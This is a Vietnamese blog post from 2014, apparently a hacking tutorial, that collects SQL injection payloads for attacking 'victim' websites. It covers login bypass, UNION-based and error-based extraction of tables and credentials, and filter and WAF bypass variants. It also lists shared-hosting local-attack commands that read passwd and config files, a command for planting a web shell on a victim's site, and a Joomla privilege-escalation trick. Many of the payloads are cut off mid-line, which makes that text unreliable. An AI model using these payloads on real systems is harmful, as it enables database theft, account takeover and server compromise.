Trang chủ
»
SQL Injection
» Tổng hợp vài câu lệnh check sqli
25 thg 4, 2014
Tổng hợp vài câu lệnh check sqli
+++Bypass login ADMIN :Username:user ' or 1=1# /admin' or '1'='1/ 1'or'1'='1
Password:pass ' or 1=1# /1'or'1'='1
++Tìm mã Hex Table
Encode Mã Hex Table~~~>http://www.convertstring.com/
Encode ~~~>Encode http://www.base64encode.org/
Decode ~~~>Decode http://www.base64decode.org/
++My Sql Injection:http://pentestmonkey.net/
++Tổng hợp Sqli:http://sla.ckers.org/forum/
++Tổng hợp Tut Sql các loại :http://khotien.com/diendan/
++Tut SQLI dạng ASPX:http://root.vn/threads/
++Tut SQLI các dạng :http://tutsql.blogspot.com/
++Các dạng Bypass :http://hack2play.blogspot.com/
++Tut SQLI dễ đến khó :http://nh0ksad.blogspot.com/
++Tut hack SQL căn bản
http://sinhvienit.net/forum/
++Khai thác Sql Bypass :
http://
++Khai thác Sql Bypass Filter + 403 Forbidden
http://
++Tut EROBASE/DOUBLE:https://top-hat-sec.com/forum/
++Các kĩ thuật Local Attack:http://ceh.vn/@4rum/
++TUT Microsoft OLE DB :http://root.vn/threads/
------------------------------
**************Dạng Java :
***id=-123 UNION SELECT 1,2,concat((0x3c73637269707420
***id=-123'+/
------------------------------
***Dạng Basic "and=0":
**Order lỗi : id=123 and=0 UNION SELECT 1,2-- -
Get table,column,data như bt thêm "and=0" sau id.
------------------------------
Check order :+/*!12345PROCEDURE*/
------------------------------
************Dạng Lồng + Bypass bt:
***Order: id=-1' uniounion SELECT 1,2,3-- -
***Get table: id=-1' uniounion SELECT 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()-- -
***Get column:id=-1' uniounion SELECT 1,group_concat(column_name),3 from information_schema.columns where table_name=0x...-- -
***Get Data: id=-1' uniounion SELECT 1,group_concat(tên cột,0x207c20,tên cột,0x207c20),3 from tên table -- -
------------------------------
***********Dạng /*!Union*/ /*!Select*/ :
**Tìm Order lỗi :link victim+null(-null,-id) /*!Union*/ /*!Select*/ 1,2,3...-- -
**Get database :link victim+ /*!Union*/ /*!Select*/ 1,2,3,group_concat(/
**Get Colum:link victim +/*!Union*/ /*!Select*/ 1,2,3,group_concat(/
**Get data :link victim +/*!Union*/ /*!Select*/ 1,2,3,group_concat(/*!tên cột,0x7c,tên cột,0x7c,tên cột,0x7c*/) from tên table-- -
------------------------------
**********Bypass nâng cao dạng /*!Union*/ /*!Select*/ loại ẩn:
***Order lỗi : id=-... /*!Union*/ /*!Select*/ 1,2,3...-- -
***Get database :id=-... /*!Union*/ /*!Select*/ 1,unhex(hex(group_concat(/
***Get table :id=-... /*!Union*/ /*!Select*/ 1,unhex(hex(group_concat(/
***Get column:id=-... /*!Union*/ /*!Select*/ 1,unhex(hex(group_concat(/
***Get data :id=-... /*!Union*/ /*!Select*/ 1,unhex(hex(group_concat(/
------------------------------
***************Dạng Bypass "=" chặn + ẩn :
***Order lỗi :id=-.../*!50000UNION*/ /*!50000SELECT*/ 1,2,3,4-- -
***Get database:id=-..../
***Get column:id=-.../*!50000UNION*/ /*!50000SELECT*/ 1,2,unhex(hex(group_concat(/
***Get Data :id=-.../*!50000UNION*/ /*!50000SELECT*/ 1,2,unhex(hex(group_concat(/
------------------------------
------------------------------
********************Dạng Bypass 403 limit ***(Khó)
+++Order lỗi :id=-1'+/*!50000union+select*/
+++Get table:id=-1'+/
+++Get column:id=-1'+/
+++Get data :id=-1'+/*!50000union+select*/
------------------------------
------------------------------
***Tìm order lỗi :id=-1+/*!50000union+select*/
***Get table:id=-1+/
***Get column:id=-1+/
***Get data:id=-1+/
------------------------------
-----------------------Dạng Bypass 403 (/*!00000UNION+SELECT*/)
***Order lỗi :id=-1'+/*!00000UNION+SELECT*/
***Get Table :id=-1'+/*!00000UNION+SELECT*/
***Get Column:id=-1'+/
***Get Data:id=-1'+/
------------------------------
*****************Dạng chặn () ~~~>cực kì khó.
***Order lỗi :UNION SELECT 1,2,3,4,5,6,7-- - (@@version)
***Get table:UNION SELECT 1,table_schema,3,4,5,6,7 from information_schema.tables where table_schema<>'information_sch
***Get column :UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_schema='tên table' and table_name=0x... LIMIT 0,1-- - (Tăng limit)
***Get Data :UNION SELECT 1,tên column,tên column,3,4,5,6,7 from tên table-- -
------------------------------
***********************Bypass %0AUNION%0ASELECT :
***Order lỗi :id=-1'+%0AUNION%0ASELECT+1,2-
***Table:id=-1'+%0AUNION%0ASEL
***Column:id=-1'+%0AUNION%0ASE
***Info Columns:id=-1'+%0AUNION%0ASELE
------------------------------
****************Dạng Lỗi String-500 ( Khai thác DB MSSQL-Giong ASPX)
***Order lỗi :id=-1' '1','2','3'-- -
***Get table:id=-1' '1',(select top 1 table_name from information_Schema.tables),'3'
***Get Column:id=-1' '1',(select top 1 column_name from information_schema.columns where table_name=('tên tbl'))),'3'-- - **Get column tiếp:(select top 1 column_name from information_Schema.columns where table_name='tên tbl' and column_name not in ('tên column1'))
***Get Data:id=-1' '1',select top 1 tên column%2b'|'%2b tên column from tên table),'3'-- -
------------------------------
****************Dạng kết hợp Bypass 403 và 406 :
***Order lỗi : id=-1+/*!20000%0d%0aunion*/+/
*****************Dạng Get data ẩn :
***group_concat(unhex(hex(tên cột)),0x7c,unhex(hex(tên cột)),0x7c,unhex(hex(tên cột)))+from+tên table-- -
------------------------------
****Bypass Filter khó (1 order or nhiều order )
***Get table :id=-1 Union Select group_concat(table_name) FrOm infOrMation_schema.tables
***Get Column :id=-1 Union Select group_concat(column_name) FrOm infOrMation_schema.tables where table_name=0x...-- -
Get Data:id=-1 Union Select group_concat(tên cột,0x7c,tên cột,0x7c) FrOm tên table-- -
*************Basic Get từng table :
***id=-1 UNION SELECT 1,table_name,3 from information_schema.tables limit 0,1-- - (Tăng limit để Get table tiếp theo )
------------------------------
*******************Dạng id=-1 order by ....-- - không tìm được Order lỗi thì Biến đổi thành id=1' order by ...-- - rồi khai thác Bt.
~~~>K Get dk table thì id=-1' .... rồi khai thác BT.
***************Dạng Table ẩn (UnIoN SeLeCT):
**Order lỗi : id=-... UNION SELECT 1,2,3,...-- -
**Get Database :id=-... UNION SELECT 1,2,database(),4,...-- - (Thay database() vào order lỗi ).
**Get Table :id=-... UNION SELECT 1,2,unhex(hex(group_concat(tab
**Get column :id=-... UNION SELECT 1,2,unhex(hex(group_concat(col
**Get data :id=-... UNION SELECT 1,2,unhex(hex(group_concat(tên
------------------------------
------------------------------
Truy vấn table có chữ cái đầu và chữ cái cuối hay chuỗi kí tự Cho Erro base+Xpath:
======> and extractvalue(rand(),concat(0x7
======>and extractvalue(rand(),concat(0x7
======>and extractvalue(rand(),concat(0x7
------------------------------
********************Dạng bypass erro base :
1./
2./*!And(Select 1 From(Select Count(*),Concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),floor(rAnd(0)*2))TYN From Information_Schema.columns Group By TYN)vnhack)*/ ~~~> Tăng limit để get thêm table.
3./*!And(Select 1 From(Select Count(*),Concat((select column_name from information_schema.columns where table_schema=database() and table_name=0x... limit 0,1),floor(rAnd(0)*2))TYN From Information_Schema.columns Group By TYN)vnhack)*/
4./*!And(Select 1 From(Select Count(*),Concat((select concat(0x7c,tên côt,0x7c,tên cột) from tên table limit 0,1),floor(rAnd(0)*2))TYN From Information_Schema.columns Group By TYN)vnhack)*/
------------------------------
****************XPath Injection(erro base) :
1.and extractvalue(rand(),concat(0x7
2.and extractvalue(rand(),concat(0x7
3.and extractvalue(rand(),concat(0x7
4.and extractvalue(rand(),concat(0x7
------------------------------
***Dạng Bypass Xpath( Khó )
1.' and extractvalue(rand(),concat/
2.' and extractvalue(rand(),concat/
3.'and extractvalue(rand(),concat/
4.'and extractvalue(rand(),concat/
------------------------------
*****************XPath Injection(erro base Cao Cấp )
1.or 1 group by concat(0x2f,version(),0x2f,dat
2.and updatexml(0,concat(0x7c,(selec
3.and updatexml(0,concat(0x7c,(selec
4.and updatexml(0,concat(0x7c,(selec
------------------------------
++Khai thác SQL = Erro Base các loại:
http://ku96.blogspot.com/2012/
http://
++Khai thác SQL Blind :
http://ceh.vn/@4rum/
++less /etc/passwd
less =cat =more.
Bộ shell : http://www.mediafire.com/
Tìm link adm site
http://root.vn/threads/
++++++++++++++++++Tut LOCAL ATTACK:
http://www.mediafire.com/
-------------------------BUG JOOMLA 1.5(COM_USER)
+++Công cụ :fire bug.
+++Path:domains/
+++Link:http://www.youtube.com/
+++Edit :<input name="jform[groups][]" value="7" />
--------------------------LOCA
+++++Tài liệu hướng dẫn Local Attack :http://ceh.vn/@4rum/
+++Tut GetRoot cơ bản :http://tutlocal.blogspot.com/
+++Lệnh view user đối vs Direc admin :
*cd /etc~~~>cat passwd
*less /etc/virtual/domainowners
+++View chuẩn xác user vs dùng Cpanel:
ls -la /etc/valiases/domain.com
+++View chmod :ls -la /path
+++Lệnh view config sever Joomla :
*less /user/domains/victim.com/
+++Cú Pháp SSI SHELL :
Ip/~user/path (Sau public_html)
++Cmd coppy Shell:
cp path shell /home/user victim/public_html/1.php
--------------Pass MD5+SALT:
+++"1ead0efb9e47a371c301afbea8
+++WP :$P$B7u/NYhVtuYh/
+++VBB :MD5:bfffa5fdecdaff2ba90ce8023
salt: <QU0OQ*_?^o"#.W>,S@`qpEYvu25l)
------------------------------
+++Chống LOCAL: Chmod folder 501 và file config về 400 .
------------------------------
+++Check pr :http://www.thuvienseo.net/
Không có nhận xét nào:
Đăng nhận xét